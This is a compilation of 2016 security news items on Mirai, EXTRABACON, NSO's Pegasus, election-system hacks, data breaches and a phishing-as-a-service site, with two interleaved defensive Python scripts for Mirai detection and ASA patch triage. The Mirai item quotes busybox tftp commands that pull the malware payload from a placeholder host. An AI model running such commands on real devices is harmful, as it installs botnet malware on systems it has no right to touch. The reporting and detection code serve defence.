It is not the first time that the researchers at Ben-Gurion have come up with a technique to target air-gapped computers. Their previous research on hacking air-gapped computers includes:
DiskFiltration attack that can steal data using sound signals emitted from the hard disk drive (HDD) of the targeted air-gapped computer;
BitWhisper that relies on heat exchange between two computer systems to stealthily siphon passwords or security keys;
AirHopper that turns a computer's video card into an FM transmitter to capture keystrokes;
Fansmitter technique that uses noise emitted by a computer fan to transmit data; and
GSMem attack that relies on cellular frequencies.
You can watch a short video of the recent attack given above, while more details can be found in the paper [PDF] titled, 'USBee: Air-Gap Covert-Channel via Electromagnetic Emission from USB.'

NSO Group, the surveillance firm that could spy on every smartphone
6.9.2016 securityaffairs BigBrothers

The NSO Group is one of the surveillance companies that allow their clients to spy on their targets through almost any smartphone.
It is quite easy for a government to spy on mobile users; recently we discussed the Trident vulnerabilities, which were exploited by surveillance software developed by the NSO Group to deliver the Pegasus malware.

But using the NSO Group’s software can be very expensive: according to The New York Times, spying on 10 iPhones will cost $650,000, plus a $500,000 setup fee.

“To spy on 10 iPhone users, NSO charges government agencies $650,000; $650,000 for 10 Android users; $500,000 for five BlackBerry users; or $300,000 for five Symbian users — on top of the setup fee, according to one commercial proposal.” reported The New York Times. “You can pay for more targets. One hundred additional targets will cost $800,000, 50 extra targets cost $500,000, 20 extra will cost $250,000 and 10 extra costs $150,000, according to an NSO Group commercial proposal. There is an annual system maintenance fee of 17 percent of the total price every year thereafter.”

Several companies develop surveillance platforms for targeting mobile devices. The NSO Group operated in the dark for several years, until researchers from the Citizen Lab organization and the Lookout firm spotted its software in targeted attacks against the UAE human rights defender Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

“The company’s internal documents detail pitches to countries throughout Europe and multimillion-dollar contracts with Mexico, which paid the NSO Group more than $15 million for three projects over three years, according to internal NSO Group emails dated in 2013.” added The New York Times.

“Our intelligence systems are subject to Mexico’s relevant legislation and have legal authorization,” Ricardo Alday, a spokesman for the Mexican embassy in Washington, said in an emailed statement. “They are not used against journalists or activists. All contracts with the federal government are done in accordance with the law.”

The New York Times conducted further investigations into the NSO Group, a company that specializes in surveillance applications for governments and law enforcement agencies around the world.

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially, sales of the surveillance software are limited to authorized governments, to support agencies’ investigations into criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

“There’s no check on this,” said Bill Marczak, a senior fellow at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. “Once NSO’s systems are sold, governments can essentially use them however they want. NSO can say they’re trying to make the world a safer place, but they are also making the world a more surveilled place.”

Companies like the NSO Group operate in the dark, in a sort of “legal gray area”: although the Israeli government exercises strict control over the export of this kind of software, surveillance applications can still be abused by threat actors and authoritarian regimes worldwide.

The principal product of the NSO Group is a surveillance software called Pegasus, which allows its operators to spy on the most common mobile devices, including iPhone, Android, BlackBerry and Symbian systems.

Pegasus is a perfect tool for surveillance: it is able to steal any kind of data from a smartphone and to use the device’s camera and microphone to spy on the surrounding environment.

“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person.” continues The New York Times.

Now we have more information about the mysterious NSO Group, but many other companies operate in the same “legal gray area.”

Linux/Mirai ELF, when malware is recycled could be still dangerous
6.9.2016 securityaffairs Virus

Experts from MalwareMustDie spotted a new ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices.
Experts from MalwareMustDie analyzed in August samples of a particular ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices. The malware takes its name from its binary, “mirai.*”, and according to the experts several attacks have been detected in the wild.

The ELF Linux/Mirai is very insidious: it is still undetected by many antivirus solutions, as confirmed by the very low detection ratio on the VirusTotal online scanning service.

“The reason for the lack of detection is because of the lack of samples, which are difficult to fetch from the infected IoT devices, routers, DVR or WebIP Camera, the Linux with Busybox binary in embedded platform, which what this threat is aiming.” states the analysis from MalwareMustDie Blog.

The last ELF examined by Security Affairs was the Linux trojan Linux.PNScan, which has been actively targeting routers based on x86 Linux in an attempt to install backdoors on them.

But MalwareMustDie tells us that Linux/Mirai “is a lot bigger than PnScan”.

And continues: “The threat was starting campaign in early August even if this ELF is not easy to be detected since it is not showing its activity soon after being installed: it sits in there and during that time, no malware file will be left over in system, all are deleted except the delayed process where the malware is running after being executed.”

This means that, once the infection succeeds, it is not easy to distinguish an infected system from a clean one except through memory analysis, and we are talking about devices that are not easy to analyze and debug. The usual analysis of the file system or of the external network traffic yields no evidence, at least at the beginning.

We are in a hostile environment, the Internet of Things (IoT), that is shaping a new kind of powerful botnet spreading worldwide. But which countries are most exposed to this kind of attack?

“Countries that are having Linux busybox IoT embedded devices that can connect to the internet, like DVR or Web IP Camera from several brands, and countries who have ISP serving users by Linux routers running with global IP address, are exposed as target, especially to the devices or services that is not securing the access for the telnet port (Tcp/23) service“

In fact, MalwareMustDie continues, “the Linux/Mirai creators succeed to encode the strings and making diversion of traffic to camouflage themself. As is possible to see analyzing the samples, shown in the link to Virustotal the best detection is only “3 of 53” or “3 to 55.”

What really matters for sysadmins is to have a shield against these infections: “along with the good friends involved in the open filtration system, security engineers are trying to push” – says MalwareMustDie again – “the correct filtration signature to alert the sysadmins if having the attacks from this threat. And on one pilot a sysadmins provided with the correct signatures, found the source attack from several hundreds of addresses within only a couple of days.”

So the infection appears to be really widespread, and the botnet appears to be very large.

For all the sysadmins who want to protect their systems, here is a list of mitigation actions:

If you have an IoT device, make sure no telnet service is open and running.
Block TCP port 48101 if you do not use it; this helps prevent infection and further damage.
Monitor telnet connections, because the botnet spreads over the Telnet service.
Reverse the process, looking for the strings reported in the MalwareMustDie detection tool tips.
But what do we know about this Linux/Mirai ELF malware exactly, and why is it not so well known among malware analysts?

“The reason why not so many people know it”, says MalwareMustDie – “is that antivirus thinks it is a variant of Gafgyt or Bashlite or Bashdoor. Then, the real samples of this malware is hard to get since most malware analysts have to extract it from memory on an infected device, or maybe have to hack the CNC to fetch those.”

This means that forensic analysis is also difficult: if the infected device is switched off, all the information is lost and it may be necessary to start again with a new infection. It recalls the Greek mobile wiretap known as the “Vodafone Hack”, where the only evidence was in memory.

But, in your opinion, what is the main difference from the previous ELF malware versions?

“The actors are now having different strategy than older type of similar threat.” – says MalwareMustDie – “by trying to be stealth (with delay), undetected (low detection hit in AV or traffic filter), unseen (no trace nor samples extracted), encoded ELF’s ASCII data, and with a big “hush-hush” among them for its distribution. But it is obvious that the main purpose is still for DDoS botnet and to rapidly spread its infection to reachable IoTs by what they call it as Telnet Scanner. ”

The real insidiousness of this ELF is that the only way to track it is to extract it from the memory of running devices, and there is little expertise among people who can “hack their own routers or webcam or DVR to get the malware binary dumped from the memory or checking the trace of infection.”

Digging into the details: how the infection works.

Attackers compromise IoT devices through their SSH or Telnet accounts, exploiting known vulnerabilities or using default passwords that the owners of the targeted systems never changed.

As we read in the latest post on the MalwareMustDie blog, this ELF uses a specific technique: it forks into a new process only if the conditions for infecting the current device are met; otherwise the node is left alone and the installation does not proceed.

Once they have shell access on the device, the attackers download the ELF Linux/Mirai payload; below is an example of the command launched on an IoT device to perform the operation:

busybox tftp -r [MalwareFile] -g [IPsource]
busybox tftp -g -l dvrHelper -r [MalwareFile] [IPsource]

It was very difficult to analyze the Linux/Mirai infection because, once executed, the malware is also able to delete the traces of its presence.

“In some cases of the Linux/Mirai infection is showing traces that the malware was executed without parameter and there are cases where the downloaded malware file(s) is deleted after execution. In this case, mostly you won’t get the samples unless you dump the malware process to the ELF binary. This explains it is hard to get the good working samples for this new threat.” continues the MalwareMustDie team.

“Upon execution the malware will be self-deleted to avoid the trace, but the process is running. In some IoT that can be seen in lsof or the list to the /proc with specific PID, i.e.:”

/proc/{PID}/exe -> '/dev/.{something}/dvrHelper' (deleted)
/proc/{PID}/exe -> './{long alphabet strings}' (deleted)

While the process runs, the malware opens a PF_INET (IPv4) TCP socket, binds it to TCP port 48101 on the localhost address and starts listening for incoming connections. The malware then forks a new process with a new PID, and “the infected device will perform connection on telnet services on other devices for the further abuse purpose.”
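The two traces just described, the “(deleted)” exe link and the loopback listener on TCP/48101, together with the outbound telnet connections named in the mitigation list, can all be checked from the host side. The script below is an added example, not MalwareMustDie's tooling: it reads /proc/<pid>/exe links and parses the /proc/net/tcp socket table, flagging a LISTEN socket on 48101 and the remote hosts being contacted on port 23. The /proc tree and the socket table it runs on are constructed here so that it runs offline; on a live device the same functions are pointed at the real /proc.

```python
"""Host-side checks for the Linux/Mirai traces described above.

Added example, not MalwareMustDie's tooling. It looks at /proc/<pid>/exe links
that the kernel reports as "(deleted)" and at /proc/net/tcp, where the sample
binds 127.0.0.1:48101 and then opens telnet (TCP/23) connections to other hosts.
The inputs used by demo() are constructed so the script runs offline.
"""
import os
import tempfile

MIRAI_BIND_PORT = 48101  # port the sample listens on (from the analysis)
TELNET_PORT = 23         # propagation vector (from the analysis)
TCP_ESTABLISHED, TCP_SYN_SENT, TCP_LISTEN = 0x01, 0x02, 0x0A  # /proc/net/tcp 'st' codes


def find_deleted_exe_processes(proc_root="/proc"):
    """Return (pid, exe_target) for processes whose executable was unlinked.

    The kernel appends " (deleted)" to readlink(/proc/<pid>/exe) when the file
    backing the process no longer exists: the trace left by a self-deleting binary.
    """
    hits = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc_root, name, "exe"))
        except OSError:  # kernel threads, permission denied, process already gone
            continue
        if target.endswith(" (deleted)"):
            hits.append((int(name), target))
    return sorted(hits)


def _decode_endpoint(field):
    """'0100007F:BBE5' -> ('127.0.0.1', 48101); the IPv4 address is little-endian hex."""
    ip_hex, port_hex = field.split(":")
    ip = ".".join(str(b) for b in reversed(bytes.fromhex(ip_hex)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse /proc/net/tcp into (local_ip, local_port, remote_ip, remote_port, state) rows."""
    rows = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        lip, lport = _decode_endpoint(fields[1])
        rip, rport = _decode_endpoint(fields[2])
        rows.append((lip, lport, rip, rport, int(fields[3], 16)))
    return rows


def socket_indicators(rows):
    """Flag the local 48101 listener and list the hosts being contacted on telnet."""
    listener = any(lport == MIRAI_BIND_PORT and st == TCP_LISTEN
                   for _, lport, _, _, st in rows)
    telnet_targets = sorted({rip for _, _, rip, rport, st in rows
                             if rport == TELNET_PORT and st in (TCP_SYN_SENT, TCP_ESTABLISHED)})
    return {"bind_48101_listener": listener, "telnet_targets": telnet_targets}


# Constructed /proc/net/tcp sample: sshd on 22, the 48101 bind on loopback, and
# three outbound telnet attempts from 10.0.0.15 (the infected "scanner").
SAMPLE_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1101 1 0 100 0 0 10 0
   1: 0100007F:BBE5 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 4417 1 0 100 0 0 10 0
   2: 0F00000A:D3A1 0501A8C0:0017 02 00000000:00000000 01:00000010 00000001     0        0 4420 1 0 100 0 0 10 0
   3: 0F00000A:D3A2 0601A8C0:0017 02 00000000:00000000 01:00000010 00000001     0        0 4421 1 0 100 0 0 10 0
   4: 0F00000A:D3A3 0701A8C0:0017 01 00000000:00000000 00:00000000 00000000     0        0 4422 1 0 100 0 0 10 0
"""


def build_demo_proc():
    """Create a fake /proc with one normal process and one self-deleted binary."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    os.makedirs(os.path.join(root, "1"))
    os.symlink("/sbin/init", os.path.join(root, "1", "exe"))
    os.makedirs(os.path.join(root, "731"))
    # A real kernel adds the " (deleted)" suffix itself; here it is written literally.
    os.symlink("/dev/.xyz/dvrHelper (deleted)", os.path.join(root, "731", "exe"))
    os.makedirs(os.path.join(root, "self"))  # non-numeric entries are skipped
    return root


def demo():
    """Run both checks over the constructed inputs and return the findings."""
    result = socket_indicators(parse_proc_net_tcp(SAMPLE_NET_TCP))
    result["deleted_exe"] = find_deleted_exe_processes(build_demo_proc())
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real device, run find_deleted_exe_processes() with the default /proc and feed the contents of /proc/net/tcp to parse_proc_net_tcp(); a process with a deleted executable that also owns the 48101 listener is the one whose memory should be dumped before the device is powered off, since the file on disk is already gone.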

The experts also provided a way to reverse a running process with a tool that will be released as open source: for the details, enjoy the analysis.

Evidence on hacks of the US State Election Systems suggest Russian origin
6.9.2016 securityaffairs Hacking

Researchers have found links between the attacks on US state election systems and campaigns managed by alleged Russian state-sponsored hackers.
Security experts at threat intelligence firm ThreatConnect have conducted an analysis on the IP addresses listed in the flash alert issued in August by the FBI that warned about two cyber attacks against the election systems in two U.S. states.

The FBI confirmed that foreign hackers penetrated state election systems and that federal experts uncovered evidence of the intrusions. The hackers breached the databases of two state election systems; for this reason the FBI issued the flash alert to election officials across the country, inviting them to adopt security measures to protect their computer systems.

“The FBI warning, contained in a “flash” alert from the FBI’s Cyber Division, a copy of which was obtained by Yahoo News, comes amid heightened concerns among U.S. intelligence officials about the possibility of cyberintrusions, potentially by Russian state-sponsored hackers, aimed at disrupting the November elections.” reported Yahoo News, which obtained a copy of the “flash” alert.

The FBI alert contains technical details about the attacks, including the IP addresses involved in both attacks, which have been analyzed by ThreatConnect.

The TTPs adopted by the attackers suggest the involvement of Russian hackers: one of the IP addresses included in the alert had surfaced before on Russian criminal underground forums, and some of the IPs belong to FortUnix Networks, a firm known to security experts because its infrastructure was used by the attackers who hit the Ukrainian power grid with the Black Energy malware in December.

The experts revealed that one of them was used in the past in spear-phishing campaigns that targeted the Justice and Development (AK) Party in Turkey, the Freedom Party in Germany, and the Ukrainian Parliament.

“However, as we looked into the 5.149.249[.]172 IP address within the FBI Flash Bulletin, we uncovered a spear phishing campaign targeting Turkey’s ruling Justice and Development (AK) Party, Ukrainian Parliament, and German Freedom Party figures from March – August 2016 that fits a known Russian targeting focus and modus operandi.” states the analysis published by ThreatConnect. “As we explored malicious activity in the IP ranges around 5.149.249[.]172 we found additional linkages back to activity that could be evidence of Russian advanced persistent threat (APT) activity. This connection around the 5.149.249[.]172 activity is more suggestive of state-backed rather than criminally motivated activity, although we are unable to assess which actor or group might be behind the attacks based on the current evidence.”

The phishing campaigns mentioned in the analysis used an open source phishing framework named Phishing Frenzy; the security experts managed to gain access to the control panel of the system used by the phishers and discovered a total of 113 emails written in Ukrainian, Turkish, German and English.

Out of the 113 total emails, 48 of them are malicious messages targeting Gmail accounts, while the rest were specifically designed to look like an email from an organization of interest for the victims.

16 of the malicious emails used to target AK Party officials were also included in the WikiLeaks dump of nearly 300,000 AK Party emails disclosed in July.

The experts from ThreatConnect also discovered connections to a Russian threat actor allegedly linked to the Russian government: one of the domains hosting the phishing content was registered with an email address associated with a domain known to be used by the infamous APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy).

Below is the evidence collected by the experts at ThreatConnect that suggests the involvement of the Russian government “but do not prove” it:

Six of the eight IP addresses belong to a Russian-owned hosting service
5.149.249[.]172 hosted a Russian cybercrime market from January – May 2015
Other IPs belonging to FortUnix infrastructure – the same provider as 5.149.249[.]172 – were seen in 2015 Ukraine power grid and news media denial of service attacks
The Acunetix and SQL injection attack method closely parallel the video from a purported Anonymous Poland (@anpoland) handle describing how they obtained athlete records from Court of Arbitration for Sport (CAS).

Enjoy the analysis.

NSA EXTRABACON exploit still threatens tens of thousands of CISCO ASA boxes
6.9.2016 securityaffairs BigBrothers

Two security experts from the Rapid 7 firm revealed that tens of thousands of CISCO ASA boxes are still vulnerable to the NSA EXTRABACON exploit.
A few weeks ago the Shadow Brokers hacker group broke into the arsenal of the NSA-linked Equation Group and leaked online data dumps containing its exploits.

ExtraBacon is one of the exploits included in the NSA arsenal; in August security experts improved it to attack newer versions of the CISCO ASA appliance. The Hungary-based security consultancy SilentSignal focused its analysis on the ExtraBacon exploit, revealing that it could be used against newer models of Cisco’s Adaptive Security Appliance (ASA).

The security firm has demonstrated that the NSA-linked Cisco exploit dubbed ExtraBacon poses a bigger threat than previously thought.
Initially, the ExtraBacon exploit was restricted to versions 8.4.(4) and earlier of the CISCO ASA boxes and has now been expanded to 9.2.(4).

The EXTRABACON tool exploits the CVE-2016-6366 vulnerability to allow an attacker who has already gained a foothold in a targeted network to take full control of a CISCO ASA firewall. The tool leverages a flaw in the Simple Network Management Protocol (SNMP) implementation of the ASA software.

“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.

“The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.”

At the end of August CISCO started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.

Network administrators that manage CISCO ASA 7.2, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6 and 8.7 have to update their installations to version 9.1.7(9) or later. The vulnerability has been fixed in the ASA 9.1, 9.5 and 9.6 with the release of versions 9.1.7(9), 9.5(3) and 9.6.1(11).
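The fixed-release statement above is easy to misread across Cisco's version notation, so here is an added example (not code from Cisco, Rapid7 or Security Affairs) that turns it into a check an administrator can run over the version banners collected from a fleet of ASA devices. It encodes only what the article states: 7.2 through 8.7 must move to 9.1.7(9) or later, and 9.1, 9.5 and 9.6 are fixed in 9.1.7(9), 9.5(3) and 9.6.1(11); any other train is reported as unknown so that the Cisco advisory, not this script, has the last word. Versions are compared as the sequence of integers they contain, which is an assumption made here so that the article's "9.1.7(9)" and the "9.1(7)9" form printed by the device are treated alike.

```python
"""Classify a Cisco ASA version string against the fixed releases quoted above.

Added example; not Cisco's, Rapid7's or Security Affairs' code. Trains not
mentioned in the article are reported as "unknown-train". Comparing versions by
their integer sequence is an assumption about notation made here.
"""
import re

# Train -> first fixed release, as quoted in the article.
FIXED_IN_TRAIN = {
    (9, 1): (9, 1, 7, 9),
    (9, 5): (9, 5, 3),
    (9, 6): (9, 6, 1, 11),
}
# Trains with no fixed release of their own: the article says upgrade to 9.1.7(9) or later.
UPGRADE_ONLY_TRAINS = {(7, 2), (8, 0), (8, 1), (8, 2), (8, 3), (8, 4), (8, 5), (8, 6), (8, 7)}

# Accepts both "9.1.7(9)" and "9.1(7)9": digits joined by '.', '(' or ')'.
VERSION_RE = re.compile(r"\d+(?:[.()]\d+)+\)?")


def parse_asa_version(text):
    """'Cisco Adaptive Security Appliance Software Version 9.1(7)9' -> (9, 1, 7, 9)."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no ASA version found in {text!r}")
    return tuple(int(n) for n in re.findall(r"\d+", m.group(0)))


def extrabacon_status(text):
    """Return 'fixed', 'vulnerable' or 'unknown-train' for a version string.

    Tuple comparison handles interim builds: (9, 1, 7) sorts below the fix
    (9, 1, 7, 9) and (9, 1, 7, 12) sorts above it.
    """
    version = parse_asa_version(text)
    train = version[:2]
    if train in UPGRADE_ONLY_TRAINS:
        return "vulnerable"
    if train in FIXED_IN_TRAIN:
        return "fixed" if version >= FIXED_IN_TRAIN[train] else "vulnerable"
    return "unknown-train"


def triage(banners):
    """Map each collected 'show version' banner to its status."""
    return {banner: extrabacon_status(banner) for banner in banners}


if __name__ == "__main__":
    # Constructed sample banners, one per device.
    sample = [
        "Cisco Adaptive Security Appliance Software Version 9.1(7)9",
        "Cisco Adaptive Security Appliance Software Version 8.4(4)",
        "Cisco Adaptive Security Appliance Software Version 9.5(2)",
        "Cisco Adaptive Security Appliance Software Version 9.2(4)",
    ]
    for banner, status in triage(sample).items():
        print(f"{status:14s} {banner}")
```

A device reported as fixed by version but with an uptime that predates the patch release is worth a second look: the upgrade requires a reload, which is exactly the signal the Rapid7 researchers used in the next section.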

Experts estimated that tens of thousands of Cisco ASA firewalls are vulnerable to an authentication bypass exploit.

The bad news

Unfortunately, two security experts from the Rapid 7 firm, Derek Abdine and Bob Rudis, revealed that tens of thousands of ASA appliances are still vulnerable to the EXTRABACON attack, judging by the time of their last reboot.

The security duo scanned roughly 50,000 ASA devices identified in a previous reconnaissance and analysed their last reboot times.

Some 10,000 of the 38,000 ASA boxes that reported an uptime had rebooted in the 15 days since Cisco released its patch, which confirms that roughly 28,000 devices are still vulnerable because they were not patched (installing the fix requires a reload). The remaining 12,000 devices did not report their last reboot time.

Going deep into the analysis, the researchers discovered that unpatched devices belong to four large US firms, a UK government agency and a financial services company, and a large Japanese telecommunications provider.

What does it mean?

It means that the above organizations are running vulnerable CISCO ASA boxes if the following conditions are met:

the ASA device must have SNMP enabled, and the attacker must be able to reach the device via SNMP over UDP (yes, SNMP can run over TCP, though it is rare to see it working that way) and must know the SNMP community string;
the attacker must also have telnet or SSH access to the device.
Exploiting ExtraBacon is therefore not so simple, but it is feasible for a persistent attacker.

“This generally makes the EXTRABACON attack something that would occur within an organization’s network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit.” wrote Abdine and Rudis.

“Even though there’s a high probable loss magnitude from a successful exploit, the threat capability and threat event frequency for attacks would most likely be low in the vast majority of organisations that use these devices to secure their environments.”

“Having said that, Extra Bacon is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organisations to deploy the patch as soon as they can obtain and test it.”

The security duo is warning the above organisations, which should not underestimate the risk of exposure to EXTRABACON attacks.

Porn Brazzersforum hacked, nearly 800,000 Brazzers Accounts Exposed
6.9.2016 securityaffairs Hacking

A data breach affecting the Brazzersforum resulted in the exposure of nearly 800,000 accounts of the popular porn site Brazzers.
Another week starts with a data breach: roughly 800,000 accounts of the porn site Brazzers have been compromised. The breach affected a separate forum, but Brazzers users who never signed up to the forum may also have been impacted.

The news was reported by Motherboard, which received the dump from the data breach monitoring website Vigilante.pw. The leaked archive includes 928,072 records with 790,724 distinct email addresses, along with usernames and passwords in plaintext.

Motherboard journalists were supported by the popular security expert Troy Hunt in verifying the authenticity of the leaked details; he confirmed that a number of the records in the data dump belong to Brazzers users.

“This matches an incident which occurred in 2012 with our ‘Brazzersforum,’ which was managed by a third party. The incident occurred because of a vulnerability in the said third party software, the ‘vBulletin’ software, and not Brazzers itself.” explained Matt Stevens, a company spokesman.

The company downplayed the extent of the data breach, explaining that only a small portion of users were impacted.

“That being said, users’ accounts were shared between Brazzers and the ‘Brazzersforum‘ which was created for user convenience. That resulted in a small portion of our user accounts being exposed and we took corrective measures in the days following this incident to protect our users,” Stevens added.

A strange detail emerged in the story: Motherboard contacted two Brazzers users to verify the authenticity of their data; both confirmed that the records were genuine, but said they had never accessed the Brazzersforum.

The forum allows Brazzers users to discuss porn content or to suggest new scenarios for future productions.

The Brazzers forum runs vBulletin, one of the most popular web forum platforms. Old vBulletin versions are affected by several easily exploitable vulnerabilities, and it is likely that the hackers exploited one of them to steal the records.

At the time of writing, Brazzersforum is under maintenance.

In response to the data breach Brazzers banned all the inactive accounts present in the dump.

“Note that the data provided contains many duplicates and non-functional accounts. We banned all non-active accounts in that list in case those usernames and passwords are re-used in the future,” Matt Stevens, public relations manager from Brazzers, told Motherboard.

“Brazzers takes the privacy and safety of its users very seriously,”

Hong Kong Government Hacked by APT3 Group before elections
4.9.2016 securityaffairs APT

Two Hong Kong government departments were targeted by Chinese hackers belonging to the APT3 group just before the legislative elections.
Security experts from FireEye have discovered a new cyber espionage campaign launched by the Chinese APT3 group against the Hong Kong government ahead of the parliamentary elections to be held today, September 4.

The hackers targeted two Hong Kong government departments to steal information related to the upcoming elections.
APT3 hackers used spear-phishing emails to lure victims to websites that delivered malicious code to their PCs. According to FireEye, the phishing emails claimed to include information about a report on the election results and contained a link to the malicious website.

APT3 was first spotted by FireEye in 2014, when the APT group was using exploits for recently disclosed Windows vulnerabilities. The experts at FireEye speculated that APT3 is the same actor behind “Operation Clandestine Fox”, uncovered by the company in April 2014, in which the hackers exploited an IE zero-day vulnerability in a series of targeted attacks.

FireEye reported in a blog post the details of the attacks run by the APT3 that exploited the Windows OLE bug and also another Windows privilege escalation vulnerability (CVE-2014-4113).

Cyber espionage campaigns conducted to gather information about government and political activities in Southeast Asia are not a novelty, and the Government of Beijing is one of the most active actors in this regard.

“Typically when we see government attacks on other governments, it’s about intelligence gathering and trying to gain access to information they can’t get via other means,” Bryce Boland, FireEye CTO for the Asia-Pac, told Agence France-Presse.

China has always put political pressure on the local Hong Kong government to discredit political opponents and candidates who fight for independence.

Leakedsource breach notification service reported two Bitcoin Data Breaches
4.9.2016 securityaffairs Hacking

Now LeakedSource disclosed details from two Bitcoin data breaches that affected the bitcoin exchange BTC-E.com and the discussion forum Bitcointalk.org.
The data breach notification service LeakedSource is becoming familiar to my readers; it recently reported the data breaches suffered by many IT services, including Last.fm and Dropbox, both of which occurred in 2012. Now LeakedSource has disclosed details of two data breaches that affected the Bitcoin sector: the incidents were suffered by the bitcoin exchange BTC-E.com and the bitcoin discussion forum Bitcointalk.org.

The incident at Bitcointalk.org was disclosed in May 2015, when the servers of the forum were compromised by attackers.

BitcoinTalk (@bitcointalk), 22 May 2015: “Server compromised due to social engineering against ISP NFOrce. There will be extended downtime for forensic analysis and reinstall.”

“The forum’s ISP NFOrce managed to get tricked into giving an attacker access to the server. I think that the attacker had access for only about 12 minutes before I noticed it and had the server disconnected, so he probably wasn’t able to get a complete dump of the database. However, you should act as though your password hashes, PMs, emails, etc. were compromised.” was reported on Reddit by the user theymos. “The forum will probably be down for 36-60 hours for analysis and reinstall. I’ll post status updates on Twitter @bitcointalk and I’ll post a complete report in a post in Meta once the forum comes back online.”

“Each password has a 12-byte unique salt. The passwords are hashed with 7500 rounds of SHA-256,” he added.

LeakedSource reported that 499,593 user records were stolen in the incident; the leaked records include usernames, passwords, emails, birthdays, secret questions, hashed secret answers and some other internal data.

91% of the passwords were hashed with sha256crypt; the experts explained that it would take about a year to crack an estimated 60-70% of them.

The remaining 9% were hashed with MD5, all with the same salt value; LeakedSource has already cracked approximately 68% of those.


The BTC-E.com incident is more mysterious; it is possible that the hackers also compromised some users’ wallets and stole bitcoins.

Despite LeakedSource’s notification, there is no news of incidents affecting BTC-E customers.

In January 2016 the Financial Underground Kingdom blog reported that the exchange had suffered one hack without consequences for its customers; it is likely that the data leaked by LeakedSource are related to that incident.

“During years of existence [BTC-E] had just 1 hack after which the owners paid all the debt to users.”

It isn’t clear whether that hack and the data disclosed by LeakedSource refer to the same incident. LeakedSource reported that BTC-E.com was hacked in October 2013 and that 568,355 users were impacted.

The passwords were protected with an unknown hashing method, making the “passwords completely uncrackable although that may change.”

Fake-Game offers a Phishing-as-a-Service platform to wannabe criminals
4.9.2016 securityaffairs Spam

Experts from Fortinet discovered a Russian website called Fake-Game that offers a Phishing-as-a-Service platform to anyone.
Phishing attacks are still one of the most effective methods of grabbing users’ credentials on the web.

Experts from Fortinet have discovered a Russian-language site called ‘Fake-Game’ that offers Phishing-as-a-Service.

“During our monitoring, we discovered that this same business model is also being used in phishing schemes in the form of a Russian website called “Fake-Game.” Appearing in (at least) July 2015, Fake-Game offers a Phishing-as-a-Service (PHaaS) platform to anyone who signs up on their website:” reads a blog post published by Fortinet.

Fake-Game phishing website

“You’ve come to the site to hijack accounts,” reads the translation of the message that the website displays.

The website is free to use, but it also offers a paid VIP version that includes additional features, such as the ability to browse all the other phished accounts.

According to its authors, Fake-Game has been used to hack into over 688,610 accounts; it is easy to use and also includes video tutorials.

Fake-Game phishing VIP account

Users only have to choose which type of credential they wish to grab (i.e. Facebook, Instagram, Google, etc.).

Fake-Game then generates a URL with a unique ID for each user.

“The link is appended by an affiliate ID which, in this case, is our subscriber’s ID. This allows the website to track which stolen accounts belong to which subscriber.” continues the Fortinet post.

“A subscriber can then spread the phishing site to prospective victims. Once a victim enters a credential into the subscriber’s phishing link, a prompt showing the stolen information appears:”

Fake-Game phishing link

Fake-Game is a classic example of crime-as-a-service: similar services allow wannabe criminals to rent infrastructure and services and enter the cyber criminal arena with ease.

Fake-Game users only need to trick victims into clicking on the Phishing URL.

Crime-as-a-service dramatically lowers the barrier for entry in the cyber criminal ecosystem.

Dutch Police Seize Two VPN Servers, But Without Explaining... Why?
3.9.2016 thehackernews Security
Recently, two European countries, France and Germany, declared war on encryption with the objective of forcing major technology companies to build encryption backdoors into their secure messaging services.
However, a neighbouring country, the Netherlands, is proactively taking down cyber criminals, but do you know how?
Dutch Police have seized two servers belonging to Virtual Private Network (VPN) provider Perfect Privacy as part of an investigation, without providing any reason for the seizures.
The Switzerland-based VPN provider said it learned of the server seizure from I3D, the company that hosts its servers in Rotterdam.
For those unfamiliar, Virtual Private Networks, or VPNs, are easy-to-use security and privacy tools that route your Internet traffic through a distant connection, protecting your browsing, hiding your location and letting you access restricted resources.
VPNs have become a valuable tool not just for large companies but also for individuals who want to improve their privacy and security online, dodge content restrictions and counter the growing threat of cyber attacks.
While many people, including digital activists, journalists, and protesters, use them for legitimate purposes, VPNs are also used by criminals and black hat hackers to protect their nefarious activities from prying eyes and stay anonymous online.
